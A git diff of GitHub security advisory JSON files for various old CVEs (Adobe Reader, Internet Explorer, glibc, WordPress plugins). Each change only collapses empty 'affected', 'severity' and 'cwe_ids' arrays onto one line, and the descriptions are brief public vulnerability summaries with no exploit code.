6c7a605df96..780569f49b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-7m45-rxr2-jh3h/GHSA-7m45-rxr2-jh3h.json +++ b/advisories/unreviewed/2022/05/GHSA-7m45-rxr2-jh3h/GHSA-7m45-rxr2-jh3h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7q5j-cmrw-cmmc/GHSA-7q5j-cmrw-cmmc.json b/advisories/unreviewed/2022/05/GHSA-7q5j-cmrw-cmmc/GHSA-7q5j-cmrw-cmmc.json index d8c08322c3d..5f5d918fe95 100644 --- a/advisories/unreviewed/2022/05/GHSA-7q5j-cmrw-cmmc/GHSA-7q5j-cmrw-cmmc.json +++ b/advisories/unreviewed/2022/05/GHSA-7q5j-cmrw-cmmc/GHSA-7q5j-cmrw-cmmc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7q6m-8g97-jq6m/GHSA-7q6m-8g97-jq6m.json b/advisories/unreviewed/2022/05/GHSA-7q6m-8g97-jq6m/GHSA-7q6m-8g97-jq6m.json index c18ab01f489..0d9d439d6a6 100644 --- a/advisories/unreviewed/2022/05/GHSA-7q6m-8g97-jq6m/GHSA-7q6m-8g97-jq6m.json +++ b/advisories/unreviewed/2022/05/GHSA-7q6m-8g97-jq6m/GHSA-7q6m-8g97-jq6m.json @@ -7,12 +7,8 @@ "CVE-2013-7423" ], "details": "The send_dg function in resolv/res_send.c in GNU C Library (aka glibc or libc6) before 2.20 does not properly reuse file descriptors, which allows remote attackers to send DNS queries to unintended locations via a large number of requests that trigger a call to the getaddrinfo function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7qmm-crg7-cffg/GHSA-7qmm-crg7-cffg.json b/advisories/unreviewed/2022/05/GHSA-7qmm-crg7-cffg/GHSA-7qmm-crg7-cffg.json index a3ed824c39c..cecce78dbd4 100644 --- a/advisories/unreviewed/2022/05/GHSA-7qmm-crg7-cffg/GHSA-7qmm-crg7-cffg.json +++ b/advisories/unreviewed/2022/05/GHSA-7qmm-crg7-cffg/GHSA-7qmm-crg7-cffg.json @@ -7,12 +7,8 @@ "CVE-2015-5586" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7qpf-hv34-vvr8/GHSA-7qpf-hv34-vvr8.json b/advisories/unreviewed/2022/05/GHSA-7qpf-hv34-vvr8/GHSA-7qpf-hv34-vvr8.json index 58317227304..828c4f29c08 100644 --- a/advisories/unreviewed/2022/05/GHSA-7qpf-hv34-vvr8/GHSA-7qpf-hv34-vvr8.json +++ b/advisories/unreviewed/2022/05/GHSA-7qpf-hv34-vvr8/GHSA-7qpf-hv34-vvr8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7r5h-fj93-j8m6/GHSA-7r5h-fj93-j8m6.json b/advisories/unreviewed/2022/05/GHSA-7r5h-fj93-j8m6/GHSA-7r5h-fj93-j8m6.json index 202fd7eacf3..2a9cf1c0e2a 100644 --- a/advisories/unreviewed/2022/05/GHSA-7r5h-fj93-j8m6/GHSA-7r5h-fj93-j8m6.json +++ b/advisories/unreviewed/2022/05/GHSA-7r5h-fj93-j8m6/GHSA-7r5h-fj93-j8m6.json @@ -7,12 +7,8 @@ "CVE-2013-2699" ], "details": "Cross-site request forgery (CSRF) vulnerability in the underConstruction plugin before 1.09 for WordPress allows remote attackers to hijack the authentication of administrators for requests that deactivate a plugin via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7rf8-3vcf-55q4/GHSA-7rf8-3vcf-55q4.json b/advisories/unreviewed/2022/05/GHSA-7rf8-3vcf-55q4/GHSA-7rf8-3vcf-55q4.json index ec308a87975..911a8820f16 100644 --- a/advisories/unreviewed/2022/05/GHSA-7rf8-3vcf-55q4/GHSA-7rf8-3vcf-55q4.json +++ b/advisories/unreviewed/2022/05/GHSA-7rf8-3vcf-55q4/GHSA-7rf8-3vcf-55q4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7v77-w3mx-vv3x/GHSA-7v77-w3mx-vv3x.json b/advisories/unreviewed/2022/05/GHSA-7v77-w3mx-vv3x/GHSA-7v77-w3mx-vv3x.json index 6e364558762..570c9e8c0d2 100644 --- a/advisories/unreviewed/2022/05/GHSA-7v77-w3mx-vv3x/GHSA-7v77-w3mx-vv3x.json +++ b/advisories/unreviewed/2022/05/GHSA-7v77-w3mx-vv3x/GHSA-7v77-w3mx-vv3x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7wf2-vmwv-jjfg/GHSA-7wf2-vmwv-jjfg.json b/advisories/unreviewed/2022/05/GHSA-7wf2-vmwv-jjfg/GHSA-7wf2-vmwv-jjfg.json index 9be11e5869e..e33d614334b 100644 --- a/advisories/unreviewed/2022/05/GHSA-7wf2-vmwv-jjfg/GHSA-7wf2-vmwv-jjfg.json +++ b/advisories/unreviewed/2022/05/GHSA-7wf2-vmwv-jjfg/GHSA-7wf2-vmwv-jjfg.json @@ -7,12 +7,8 @@ "CVE-2012-1523" ], "details": "Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \"Center Element Remote Code Execution Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-845h-p5w8-7w6g/GHSA-845h-p5w8-7w6g.json b/advisories/unreviewed/2022/05/GHSA-845h-p5w8-7w6g/GHSA-845h-p5w8-7w6g.json index 5c4da97baf3..261811b7566 100644 --- a/advisories/unreviewed/2022/05/GHSA-845h-p5w8-7w6g/GHSA-845h-p5w8-7w6g.json +++ b/advisories/unreviewed/2022/05/GHSA-845h-p5w8-7w6g/GHSA-845h-p5w8-7w6g.json @@ -7,12 +7,8 @@ "CVE-2012-2192" ], "details": "The socketpair function in IBM AIX 5.3, 6.1, and 7.1 and VIOS 2.2.1.4-FP-25 SP-02 allows local users to cause a denial of service (system crash) via a crafted application that leverages the presence of a socket on the free list.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-84gc-mwwx-2x6j/GHSA-84gc-mwwx-2x6j.json b/advisories/unreviewed/2022/05/GHSA-84gc-mwwx-2x6j/GHSA-84gc-mwwx-2x6j.json index e2be3f575de..774c8c22a3e 100644 --- a/advisories/unreviewed/2022/05/GHSA-84gc-mwwx-2x6j/GHSA-84gc-mwwx-2x6j.json +++ b/advisories/unreviewed/2022/05/GHSA-84gc-mwwx-2x6j/GHSA-84gc-mwwx-2x6j.json @@ -7,12 +7,8 @@ "CVE-2015-6689" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via a crafted WillSave document action, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-84mm-87vg-44q4/GHSA-84mm-87vg-44q4.json b/advisories/unreviewed/2022/05/GHSA-84mm-87vg-44q4/GHSA-84mm-87vg-44q4.json index 34b609c1f6b..8a1a507ad58 100644 --- a/advisories/unreviewed/2022/05/GHSA-84mm-87vg-44q4/GHSA-84mm-87vg-44q4.json +++ b/advisories/unreviewed/2022/05/GHSA-84mm-87vg-44q4/GHSA-84mm-87vg-44q4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-859j-57r4-5mwx/GHSA-859j-57r4-5mwx.json b/advisories/unreviewed/2022/05/GHSA-859j-57r4-5mwx/GHSA-859j-57r4-5mwx.json index 0d8f76199d6..d0db02598fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-859j-57r4-5mwx/GHSA-859j-57r4-5mwx.json +++ b/advisories/unreviewed/2022/05/GHSA-859j-57r4-5mwx/GHSA-859j-57r4-5mwx.json @@ -7,12 +7,8 @@ "CVE-2015-5104" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3095, CVE-2015-5087, CVE-2015-5094, CVE-2015-5100, CVE-2015-5102, CVE-2015-5103, and CVE-2015-5115.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-85g9-cpf6-gw3r/GHSA-85g9-cpf6-gw3r.json b/advisories/unreviewed/2022/05/GHSA-85g9-cpf6-gw3r/GHSA-85g9-cpf6-gw3r.json index abb0c6a8ec3..5fd27af160c 100644 --- a/advisories/unreviewed/2022/05/GHSA-85g9-cpf6-gw3r/GHSA-85g9-cpf6-gw3r.json +++ b/advisories/unreviewed/2022/05/GHSA-85g9-cpf6-gw3r/GHSA-85g9-cpf6-gw3r.json @@ -7,12 +7,8 @@ "CVE-2008-7234" ], "details": "Unspecified vulnerability in the Oracle BPEL Worklist Application component in Oracle Application Server 10.1.2.2 and 10.1.3.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, aka AS03.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-877r-f5r6-mp8j/GHSA-877r-f5r6-mp8j.json b/advisories/unreviewed/2022/05/GHSA-877r-f5r6-mp8j/GHSA-877r-f5r6-mp8j.json index 820a9b1d830..d6931980e73 100644 --- a/advisories/unreviewed/2022/05/GHSA-877r-f5r6-mp8j/GHSA-877r-f5r6-mp8j.json +++ b/advisories/unreviewed/2022/05/GHSA-877r-f5r6-mp8j/GHSA-877r-f5r6-mp8j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-87g4-hr45-wmvj/GHSA-87g4-hr45-wmvj.json b/advisories/unreviewed/2022/05/GHSA-87g4-hr45-wmvj/GHSA-87g4-hr45-wmvj.json index e01fae32725..8b37867b4d7 100644 --- a/advisories/unreviewed/2022/05/GHSA-87g4-hr45-wmvj/GHSA-87g4-hr45-wmvj.json +++ b/advisories/unreviewed/2022/05/GHSA-87g4-hr45-wmvj/GHSA-87g4-hr45-wmvj.json @@ -7,12 +7,8 @@ "CVE-2011-1305" ], "details": "Race condition in Google Chrome before 11.0.696.57 on Linux and Mac OS X allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to linked lists and a database.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-87rg-h7g7-r462/GHSA-87rg-h7g7-r462.json b/advisories/unreviewed/2022/05/GHSA-87rg-h7g7-r462/GHSA-87rg-h7g7-r462.json index e9ddf10c315..c8bf1149197 100644 --- a/advisories/unreviewed/2022/05/GHSA-87rg-h7g7-r462/GHSA-87rg-h7g7-r462.json +++ b/advisories/unreviewed/2022/05/GHSA-87rg-h7g7-r462/GHSA-87rg-h7g7-r462.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-88qg-r83j-hg74/GHSA-88qg-r83j-hg74.json b/advisories/unreviewed/2022/05/GHSA-88qg-r83j-hg74/GHSA-88qg-r83j-hg74.json index 1c0f0063062..317896432b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-88qg-r83j-hg74/GHSA-88qg-r83j-hg74.json +++ b/advisories/unreviewed/2022/05/GHSA-88qg-r83j-hg74/GHSA-88qg-r83j-hg74.json @@ -7,12 +7,8 @@ "CVE-2015-7618" ], "details": "The CBAutoConfigCommentRepository method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-899x-3fcr-8p3x/GHSA-899x-3fcr-8p3x.json b/advisories/unreviewed/2022/05/GHSA-899x-3fcr-8p3x/GHSA-899x-3fcr-8p3x.json index 6fae6791981..1e5cbdb1a66 100644 --- a/advisories/unreviewed/2022/05/GHSA-899x-3fcr-8p3x/GHSA-899x-3fcr-8p3x.json +++ b/advisories/unreviewed/2022/05/GHSA-899x-3fcr-8p3x/GHSA-899x-3fcr-8p3x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-89cf-2vwq-45m6/GHSA-89cf-2vwq-45m6.json b/advisories/unreviewed/2022/05/GHSA-89cf-2vwq-45m6/GHSA-89cf-2vwq-45m6.json index 38da665f394..966f2b12e59 100644 --- a/advisories/unreviewed/2022/05/GHSA-89cf-2vwq-45m6/GHSA-89cf-2vwq-45m6.json +++ b/advisories/unreviewed/2022/05/GHSA-89cf-2vwq-45m6/GHSA-89cf-2vwq-45m6.json @@ -7,12 +7,8 @@ "CVE-2010-2442" ], "details": "Microsoft Internet Explorer, possibly 8, does not properly restrict focus changes, which allows remote attackers to read keystrokes via \"cross-domain IFRAME gadgets.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-89g7-q4h7-vjxh/GHSA-89g7-q4h7-vjxh.json b/advisories/unreviewed/2022/05/GHSA-89g7-q4h7-vjxh/GHSA-89g7-q4h7-vjxh.json index 59477a6a43b..5603db4c3c5 100644 --- a/advisories/unreviewed/2022/05/GHSA-89g7-q4h7-vjxh/GHSA-89g7-q4h7-vjxh.json +++ b/advisories/unreviewed/2022/05/GHSA-89g7-q4h7-vjxh/GHSA-89g7-q4h7-vjxh.json @@ -7,12 +7,8 @@ "CVE-2012-2418" ], "details": "Heap-based buffer overflow in the intu-help-qb (aka Intuit Help System Async Pluggable Protocol) handlers in HelpAsyncPluggableProtocol.dll in Intuit QuickBooks 2009 through 2012, when Internet Explorer is used, allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a URI with a % (percent) character as its (1) last or (2) second-to-last character.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-89pv-4g4h-69v4/GHSA-89pv-4g4h-69v4.json b/advisories/unreviewed/2022/05/GHSA-89pv-4g4h-69v4/GHSA-89pv-4g4h-69v4.json index 27cb2b3f748..cca0bec550c 100644 --- a/advisories/unreviewed/2022/05/GHSA-89pv-4g4h-69v4/GHSA-89pv-4g4h-69v4.json +++ b/advisories/unreviewed/2022/05/GHSA-89pv-4g4h-69v4/GHSA-89pv-4g4h-69v4.json @@ -7,12 +7,8 @@ "CVE-2015-4444" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to cause a denial of service (NULL pointer dereference) via unspecified vectors, a different vulnerability than CVE-2015-4443.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8c2h-4vmr-78g7/GHSA-8c2h-4vmr-78g7.json b/advisories/unreviewed/2022/05/GHSA-8c2h-4vmr-78g7/GHSA-8c2h-4vmr-78g7.json index b916b0998d6..3a081380779 100644 --- a/advisories/unreviewed/2022/05/GHSA-8c2h-4vmr-78g7/GHSA-8c2h-4vmr-78g7.json +++ b/advisories/unreviewed/2022/05/GHSA-8c2h-4vmr-78g7/GHSA-8c2h-4vmr-78g7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8f34-h6m3-5298/GHSA-8f34-h6m3-5298.json b/advisories/unreviewed/2022/05/GHSA-8f34-h6m3-5298/GHSA-8f34-h6m3-5298.json index cd7f794ff2b..74ec919048b 100644 --- a/advisories/unreviewed/2022/05/GHSA-8f34-h6m3-5298/GHSA-8f34-h6m3-5298.json +++ b/advisories/unreviewed/2022/05/GHSA-8f34-h6m3-5298/GHSA-8f34-h6m3-5298.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8fxg-pcq5-47h6/GHSA-8fxg-pcq5-47h6.json b/advisories/unreviewed/2022/05/GHSA-8fxg-pcq5-47h6/GHSA-8fxg-pcq5-47h6.json index 784fd487dbd..8d46ead576d 100644 --- a/advisories/unreviewed/2022/05/GHSA-8fxg-pcq5-47h6/GHSA-8fxg-pcq5-47h6.json +++ b/advisories/unreviewed/2022/05/GHSA-8fxg-pcq5-47h6/GHSA-8fxg-pcq5-47h6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8g93-59h5-qx5g/GHSA-8g93-59h5-qx5g.json b/advisories/unreviewed/2022/05/GHSA-8g93-59h5-qx5g/GHSA-8g93-59h5-qx5g.json index 9e47b1ed1c9..155fa5daa06 100644 --- a/advisories/unreviewed/2022/05/GHSA-8g93-59h5-qx5g/GHSA-8g93-59h5-qx5g.json +++ b/advisories/unreviewed/2022/05/GHSA-8g93-59h5-qx5g/GHSA-8g93-59h5-qx5g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8gj2-cpjj-73rf/GHSA-8gj2-cpjj-73rf.json b/advisories/unreviewed/2022/05/GHSA-8gj2-cpjj-73rf/GHSA-8gj2-cpjj-73rf.json index 8a4588d1407..678ffb7dc86 100644 --- a/advisories/unreviewed/2022/05/GHSA-8gj2-cpjj-73rf/GHSA-8gj2-cpjj-73rf.json +++ b/advisories/unreviewed/2022/05/GHSA-8gj2-cpjj-73rf/GHSA-8gj2-cpjj-73rf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8h5f-fg8r-h935/GHSA-8h5f-fg8r-h935.json b/advisories/unreviewed/2022/05/GHSA-8h5f-fg8r-h935/GHSA-8h5f-fg8r-h935.json index f157c726da5..dcfd7d12460 100644 --- a/advisories/unreviewed/2022/05/GHSA-8h5f-fg8r-h935/GHSA-8h5f-fg8r-h935.json +++ b/advisories/unreviewed/2022/05/GHSA-8h5f-fg8r-h935/GHSA-8h5f-fg8r-h935.json @@ -7,12 +7,8 @@ "CVE-2010-2118" ], "details": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8h75-mg5r-whjx/GHSA-8h75-mg5r-whjx.json b/advisories/unreviewed/2022/05/GHSA-8h75-mg5r-whjx/GHSA-8h75-mg5r-whjx.json index e0ba3548673..1ec5f936d62 100644 --- a/advisories/unreviewed/2022/05/GHSA-8h75-mg5r-whjx/GHSA-8h75-mg5r-whjx.json +++ b/advisories/unreviewed/2022/05/GHSA-8h75-mg5r-whjx/GHSA-8h75-mg5r-whjx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8j37-r2fw-56qv/GHSA-8j37-r2fw-56qv.json b/advisories/unreviewed/2022/05/GHSA-8j37-r2fw-56qv/GHSA-8j37-r2fw-56qv.json index 7ee4d69f4b0..5b497af3931 100644 --- a/advisories/unreviewed/2022/05/GHSA-8j37-r2fw-56qv/GHSA-8j37-r2fw-56qv.json +++ b/advisories/unreviewed/2022/05/GHSA-8j37-r2fw-56qv/GHSA-8j37-r2fw-56qv.json @@ -7,12 +7,8 @@ "CVE-2015-5109" ], "details": "Integer overflow in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5097 and CVE-2015-5108.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8mrp-f43f-c35w/GHSA-8mrp-f43f-c35w.json b/advisories/unreviewed/2022/05/GHSA-8mrp-f43f-c35w/GHSA-8mrp-f43f-c35w.json index 0b29116ff9e..eb2a5cd8321 100644 --- a/advisories/unreviewed/2022/05/GHSA-8mrp-f43f-c35w/GHSA-8mrp-f43f-c35w.json +++ b/advisories/unreviewed/2022/05/GHSA-8mrp-f43f-c35w/GHSA-8mrp-f43f-c35w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8p4r-6mg7-x24h/GHSA-8p4r-6mg7-x24h.json b/advisories/unreviewed/2022/05/GHSA-8p4r-6mg7-x24h/GHSA-8p4r-6mg7-x24h.json index ed945156311..3546c37d319 100644 --- a/advisories/unreviewed/2022/05/GHSA-8p4r-6mg7-x24h/GHSA-8p4r-6mg7-x24h.json +++ b/advisories/unreviewed/2022/05/GHSA-8p4r-6mg7-x24h/GHSA-8p4r-6mg7-x24h.json @@ -7,12 +7,8 @@ "CVE-2015-6711" ], "details": "The DoIdentityDialog method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8pj8-jjrc-8g8h/GHSA-8pj8-jjrc-8g8h.json b/advisories/unreviewed/2022/05/GHSA-8pj8-jjrc-8g8h/GHSA-8pj8-jjrc-8g8h.json index acf8b5845b5..306c1748358 100644 --- a/advisories/unreviewed/2022/05/GHSA-8pj8-jjrc-8g8h/GHSA-8pj8-jjrc-8g8h.json +++ b/advisories/unreviewed/2022/05/GHSA-8pj8-jjrc-8g8h/GHSA-8pj8-jjrc-8g8h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8qvv-xwvj-235m/GHSA-8qvv-xwvj-235m.json b/advisories/unreviewed/2022/05/GHSA-8qvv-xwvj-235m/GHSA-8qvv-xwvj-235m.json index 6ecfe7734e0..595dd58fb44 100644 --- a/advisories/unreviewed/2022/05/GHSA-8qvv-xwvj-235m/GHSA-8qvv-xwvj-235m.json +++ b/advisories/unreviewed/2022/05/GHSA-8qvv-xwvj-235m/GHSA-8qvv-xwvj-235m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8wcm-px2f-w8qx/GHSA-8wcm-px2f-w8qx.json 